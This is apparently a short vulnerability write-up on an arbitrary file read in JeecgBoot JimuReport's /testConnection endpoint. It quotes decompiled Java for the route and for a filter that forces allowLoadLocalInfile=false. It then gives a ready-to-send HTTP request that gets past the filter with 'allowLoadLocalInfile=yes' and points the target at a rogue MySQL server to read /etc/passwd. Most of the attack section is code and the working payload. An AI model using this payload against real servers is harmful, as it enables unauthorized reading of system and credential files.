In the /testConnection route, a MySQL connection can be constructed to cause arbitrary file reading.
@PostMapping({"/testConnection"})
public Result a(@RequestBody JmreportDynamicDataSourceVo var1) {
Connection var2 = null;
String var3 = var1.toString();
a.info(" local cache key: " + var3);
Object var4 = this.localCache.a(var3);
if (g.d(var4)) {
int var5 = g.e(var4);
a.info(" local cache value: " + var5);
if (var5 >= 3) {
return Result.error("数据源已连接错误3次以上,请检查配置信息!");
}
if (var5 == 0) {
return Result.OK("数据库连接成功", true);
}
} else {
this.localCache.a(var3, 0, 3600000L);
}
try {
Result var6;
try {
String var37 = var1.getDbType();
Result var40;
if (this.jmReportDbSourceService.isHave(d.cI, var37)) {
boolean var39 = this.jmreportNoSqlService.testConnection(var1);
if (var39) {
var40 = Result.OK("数据库连接成功", true);
return var40;
} else {
this.localCache.a(var3, 1);
var40 = Result.error("数据库连接失败:错误未知");
return var40;
}
} else {
Class.forName(var1.getDbDriver());
DriverManager.setLoginTimeout(60);
String var38 = org.jeecg.modules.jmreport.dyndb.util.b.g(var1.getDbUrl());
var2 = DriverManager.getConnection(var38, var1.getDbUsername(), var1.getDbPassword());
if (var2 == null) {
this.localCache.a(var3, 1);
var40 = Result.OK("数据库连接失败:错误未知", true);
return var40;
There is protection during the parsing process.
public static String g(String var0) {
if (a(var0, "mysql")) {
if (var0.indexOf("allowLoadLocalInfile") > 0) {
var0 = var0.replaceAll("(?i)allowLoadLocalInfile=true", "allowLoadLocalInfile=false");
} else {
var0 = var0 + "&allowLoadLocalInfile=false";
}
}
we can bypass it
POST /jeecg-boot/jmreport/testConnection HTTP/1.1
Host: 127.0.0.1:8080
Content-Length: 0
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
{
"id":"1",
"code":"select * from information_schema.tables",
"dbType":"jndi",
"dbDriver":"com.mysql.cj.jdbc.Driver",
"dbUrl":"jdbc:mysql://localhost:3307/test?allowLoadLocalInfile=yes",
"dbName":"information_schema",
"dbUsername":"fileread_/etc/passwd",
"dbPassword":"password",
"connectionTimaes":"5"
}